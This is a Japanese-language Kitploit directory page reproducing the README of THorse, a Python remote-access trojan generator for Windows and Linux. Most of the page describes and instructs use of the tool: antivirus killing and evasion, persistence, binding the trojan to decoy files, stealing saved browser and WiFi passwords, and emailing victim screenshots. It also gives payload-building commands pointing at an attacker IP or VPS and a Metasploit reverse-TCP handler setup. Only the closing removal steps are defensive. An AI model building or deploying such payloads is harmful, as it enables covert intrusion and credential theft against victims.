Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
thorse — THorse は、Python 3 で書かれた Windows/Linux システム向けの RAT (リモート管理者トロイの木馬) ジェネレーターです。 | Kitploit
ツール/GitHubGitHub/pushpenderindia/thorse
パスワードクラッキングエクスプロイトフレームワークペイロード生成永続化メカニズムIDS/IPS回避ポストエクスプロイトコマンド&コントロールリモートアクセストロイの木馬アンチボット
GitHubpushpenderindia/thorse

thorse

THorse は、Python 3 で書かれた Windows/Linux システム向けの RAT (リモート管理者トロイの木馬) ジェネレーターです。

614126512年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る

THorse

THorse は、Python 3 で書かれた Windows/Linux システム向けの RAT (リモート管理トロイの木馬) ジェネレーターです。

root@kitploit:~
                    この小さな Python スクリプトは、本当に素晴らしい仕事をすることができます。

免責事項

:computer: このプロジェクトは、良い目的と個人使用のためにのみ作成されました。

このソフトウェアは「現状のまま」提供され、いかなる種類の保証もありません。自己責任で使用してください。使用はエンドユーザーの完全な責任です。開発者は、このプログラムによって引き起こされた誤用や損害について一切の責任を負いません。

機能

  • Windows/Linux で動作
  • 新しい被害者をメールで通知
  • 検出されにくい
  • root または管理者権限は不要
  • 永続化
  • 被害者 PC のスクリーンショットをメールで送信
  • 攻撃者に完全な Meterpreter アクセスを提供
  • トロイの木馬作成に Metasploit のインストールは不要
  • 依存関係ゼロの実行可能バイナリを作成
  • 高度な機能を持ちながら約 5MB の小さなペイロードを作成
  • コンパイル前にペイロードを難読化し、さらにいくつかのアンチウイルスを回避
  • 生成されたペイロードは Base64 でエンコードされ、リバースエンジニアリングが非常に困難
  • 被害者 PC のアンチウイルスを無効化し、Windows セキュリティセンターを無効化しようとする
  • ペイロード生成のためのカラフルなインターフェース
  • 攻撃者側: ペイロード作成時に不足している依存関係を自動検出してインストール
  • 悪意のあるファイルにカスタムアイコンを追加可能
  • 内蔵バインダー:任意のファイル [.pdf, .txt, .exe など] に実行可能ファイルをバインド可能。表向きは正当なファイルを実行し、バックエンドで悪意のあるコードをサービスとして実行。
  • システム上の既存インスタンスをチェック。実行中のインスタンスが見つかった場合は、正当なファイルのみを実行 [多重インスタンス禁止]。
  • 攻撃者は Linux システムを使用して Windows/Linux OS の両方を作成/コンパイル可能。ただし、Windows マシンでは Windows 実行可能ファイルのみを作成/コンパイル可能。
  • 被害者システムから保存されたパスワードを取得し、攻撃者に送信。
保存されたパスワードの取得元(サポート)
Chrome ブラウザ
WiFi

注:カスタムスティーラーがコード化されており、LaZagne には依存していません。

テスト済み環境

Kali) Kali Linux - ROLLING EDITION

Windows) Windows 10

Windows) Windows 8.1 - Pro

Windows) Windows 7 - Ultimate

Metasploit を使用して生成された Meterpreter ペイロードの制限事項は以下の通りです:-

  • バックドアを実行する前に Metasploit リスナーを実行する必要がある
  • バックドア自体は永続化しないため、永続化にはポストエクスプロイトモジュールを使用する必要がある。ポストエクスプロイトモジュールは、エクスプロイトが成功した後にのみ使用可能。
  • 新しいシステムでペイロードが実行されたときに通知されない。

Meterpreter ペイロードがどれほど強力かは周知の通りですが、それでも満足のいくものではありません。

このペイロードジェネレーターの以下の機能が、この Python スクリプトの良さを理解する助けになります:-

  • Windows レジストリを使用して Windows で永続化。
  • Linux システムでも永続化を試みる。
  • ペイロードは LINUX および WINDOWS の両方で実行可能。
  • 完全なアクセスを提供。Metasploit リスナーを使用可能であり、カスタムリスナーもサポート(独自のリスナーを作成可能)。
  • 新しいシステムでペイロードが実行されるたびに、完全なシステム情報を含むメール通知を送信。
  • 1分以内またはそれ以下の時間でペイロードを生成。
  • すべての Meterpreter ポストエクスプロイトモジュールをサポート。
  • Windows および Linux システムでペイロードを作成可能。

前提条件

  • Python 3.X
  • いくつかの外部モジュール

注意:

Windows では、paygen.py の 14行目 に Pyinstaller のパスを指定/設定してください。

デフォルトのパスは次の通りです: PYTHON_PYINSTALLER_PATH = os.path.expanduser("C:/Python37-32/Scripts/pyinstaller.exe")

システムに合わせて変更してください。

Linux での使用方法

root@kitploit:~
# 依存関係のインストール
$ 最新の Python 3.x をインストール

# /opt ディレクトリに移動(オプション)
$ cd /opt/

# リポジトリをクローン
$ git clone https://github.com/PushpenderIndia/thorse.git

# リポジトリに移動
$ cd thorse

# 依存関係のインストール
$ bash installer_linux.sh

# installer_linux.sh の実行中にエラーが発生した場合は、installer_linux.py を使用してインストールしてみてください。
$ python3 installer_linux.py

$ chmod +x paygen.py
$ python3 paygen.py --help

# ペイロード/RAT の作成
$ python3 paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path

# カスタム AVKiller を使用したペイロード/RAT の作成 [デフォルトでは、多数の既知のアンチウイルスが Kill_Targets に追加されています]
$ python3 paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --kill_av AntiVirus.exe

# 永続化までのカスタム時間を設定したペイロード/RAT の作成
$ python3 paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --persistence 10 

注: icon フォルダにあるカスタムアイコンも使用できます。次のように使用してください: --icon icon/pdf.ico

VPS での使用方法(推奨)

root@kitploit:~
# 1. VPS をセットアップします。Digital Ocean、Linode、AWS などの VPS プロバイダーから Ubuntu VPS を購入できます。

# 2. SSH を使用して VPS に接続
$ ssh username@ip_address

# 3. Linux VPS を更新
$ sudo apt update

# 4. Kali Linux リポジトリを追加
$ sudo sh -c "echo 'deb https://http.kali.org/kali kali-rolling main non-free contrib' > /etc/apt/sources.list.d/kali.list"

# 5. gnupg パッケージをインストール
$ sudo apt install gnupg

# 6. Kali Public Keys を追加
$ wget 'https://archive.kali.org/archive-key.asc' && sudo apt-key add archive-key.asc

# 7. VPS を更新
$ sudo apt update

# 8. Kali の優先順位を設定
$ sudo sh -c "echo 'Package: *'>/etc/apt/preferences.d/kali.pref; echo 'Pin: release a=kali-rolling'>>/etc/apt/preferences.d/kali.pref; echo 'Pin-Priority: 50'>>/etc/apt/preferences.d/kali.pref"

# 9. VPS を更新
$ sudo apt update

# 10. VPS に Metasploit Framework をインストール
$ sudo apt install -t kali-rolling metasploit-framework

# 注: 上記の手順は一度だけ実行する必要があります。

# 11. pip3 をインストール
$ sudo apt install python3-pip

# 12. リポジトリをクローン
$ git clone https://github.com/PushpenderIndia/thorse.git

# 13. リポジトリに移動
$ cd thorse

# 14. 依存関係のインストール
$ bash installer_linux.sh

# 15. installer_linux.sh の実行中にエラーが発生した場合は、installer_linux.py を使用してインストールしてみてください。
$ python3 installer_linux.py

$ 16. chmod +x paygen.py
$ python3 paygen.py --help

# ペイロード/RAT の作成(Windows 用の RAT をコンパイルする場合は、Windows マシンで RAT をビルドし、VPS を使用してリモートで RAT を制御します)
$ python3 paygen.py --ip VPS_Public_IP_Address --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path

# カスタム AVKiller を使用したペイロード/RAT の作成 [デフォルトでは、多数の既知のアンチウイルスが Kill_Targets に追加されています]
$ python3 paygen.py --ip VPS_Public_IP_Address --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --kill_av AntiVirus.exe

# 永続化までのカスタム時間を設定したペイロード/RAT の作成
$ python3 paygen.py --ip VPS_Public_IP_Address --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --persistence 10 

注: icon フォルダにあるカスタムアイコンも使用できます。次のように使用してください: --icon icon/pdf.ico

Windows での使用方法

root@kitploit:~
# 依存関係のインストール
$ 最新の Python 3.x をインストール

# リポジトリをクローン
$ git clone https://github.com/PushpenderIndia/thorse.git

# リポジトリに移動
$ cd thorse

# 依存関係のインストール
$ python -m pip install -r requirements.txt

# paygen.py をテキストエディタで開き、15行目を設定します。Pyinstaller のパスを設定します。デフォルトのパスは次の通りです。
# PYTHON_PYINSTALLER_PATH = os.path.expanduser("C:/Python37-32/Scripts/pyinstaller.exe")

# ヘルプメニューの表示
$ python paygen.py --help

# ペイロード/RAT の作成
$ python paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -w -o output_file_name --icon icon_path

# カスタム AVKiller を使用したペイロード/RAT の作成 [デフォルトでは、多数の既知のアンチウイルスが Kill_Targets に追加されています]
$ python paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --kill_av AntiVirus.exe

# 正当なファイルにバインドされたペイロード/RAT の作成 [任意のファイル .exe, .pdf, .txt など]
$ python paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon/txt.ico --bind passwords.txt 

注: icon フォルダにあるカスタムアイコンも使用できます。次のように使用してください: --icon icon/pdf.ico

注意: 悪意のあるファイルは technowhorse/ フォルダ内の dist/ フォルダに保存されます。

Msfconsole を使用した接続の確立

  • 接続を確立するには、システムに Metasploit-Framework をインストールする必要があります。

  • 推奨設定。2行目のペイロードは他のものでテストすることもできます。

root@kitploit:~
$ sudo msfconsole
msf3> use exploit/multi/handler
msf3> set payload python/meterpreter/reverse_tcp
msf3> set LHOST 192.168.43.221
msf3> set LPORT 443
msf3> run

アップデート方法

  • updater.py を実行して自動更新するか、この GitHub リポジトリから最新の Zip をダウンロードしてください。
  • 注: updater.py を使用するには Git がインストールされている必要があります。

利用可能な引数

  • オプション引数

注: -w/--windows または -l/--linux のどちらかを指定する必要があります。

  • 必須引数

新しいスクリーンショット:

ヘルプの表示

ペイロードの生成

古い画像も参照してください。

~古いスクリーンショット:

ヘルプの表示

paygen.py スクリプトの実行

RAT が実行されると、永続化のためにレジストリを追加

自身のコピーを作成し、Roaming に保存

RAT によって送信されたレポート

被害者 PC からの通知の取得

コントリビューター:

現在、このリポジトリは私 (Pushpender Singh) が管理しています。しかし、コントリビューターになりたい場合は、クールな機能を追加してプルリクエストを作成してください。レビュー後、マージします。

すべてのコントリビューターのプルリクエストは、このリポジトリにふさわしい場合に受け入れられます。

TODO

  • 新機能を追加
  • GUI のコントリビュート

Windows での TechNowHorse の削除:

方法 1:

  • スタートに移動し、regedit と入力して最初のプログラムを実行します。これでレジストリエディタが開きます。
  • 次のパスに移動: Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 「winexplorer」というエントリがあるはずです。これを右クリックして「削除」を選択します。
  • ユーザーパス > AppData > Roaming に移動すると、「explorer.exe」というファイルがあります。これが RAT です。右クリック > 削除。
  • システムを再起動します。

方法 2:

  • 感染したシステムで「RemoveTHorse.bat」を実行し、PC を再起動して現在実行中の悪意のあるファイルを停止します。

Linux での TechNowHorse の削除:

  • 任意のテキストエディタで Autostart ファイルを開きます。 Autostart ファイルのパス: ~/.config/autostart/xinput.desktop

  • 次の5行を削除します:

    root@kitploit:~
       [Desktop Entry]
       Type=Application
       X-GNOME-Autostart-enabled=true
       Name=Xinput
       Exec="destination_file_name"
    
  • 注意: destination_file_name は、-o パラメータでトロイの木馬に指定した悪意のあるファイルの名前です。

  • システムを再起動し、以下のパスに保存されている悪意のあるファイルを削除します。

  • トロイの木馬が保存されているパス: ~/.config/xnput

コントリビューター

  • 専用のコントリビューターリスト: コントリビューター

Pushpender Singh

:computer:

いかなる種類のコントリビューションも歓迎します!

注: もしあなたがコントリビューターリストに載っているべきなのに載っていない場合は、お知らせください!

TODO リスト

  • 自分の機能を提案してください: )
  • GUI 開発
  • バグ修正
  • さらに多くのブラウザパスワードスティーラーを追加
ツールをダウンロード
Short HandFull Hand説明
-h--helpこのヘルプメッセージを表示して終了
-k KILL_AV--kill_av KILL_AVアンチウイルスキラー: 停止する AV の .exe を指定。例:--kill_av cmd.exe
-t TIME_IN_SECONDS--persistence TIME_PERSISTENT__ 秒後に永続化。デフォルト=10
-w--windowsWindows 実行可能ファイルを生成。
-l--linuxLinux 実行可能ファイルを生成。
-b file.txt--bind LEGITIMATE_FILE_PATH.pdf自動バインダー: 正当なファイルのパスを指定。[対応 OS: Windows]
-s--steal-password被害者マシンから保存されたパスワードを盗む [対応 OS: Windows]
-d--debugウイルスをフォアグラウンドで実行
Short HandFull Hand説明
--icon ICONアイコンパスを指定。悪意のあるファイルのアイコン [注意: .ico 形式である必要があります]
--ip IP_ADDRESSレポート送信先のメールアドレス。
--port PORT--ip 引数で指定された IP アドレスのポート。
-e EMAIL--email EMAILレポート送信先のメールアドレス。
-p PASSWORD--password PASSWORD-e 引数で指定されたメールアドレスのパスワード。
-o OUT--out OUT出力ファイル名。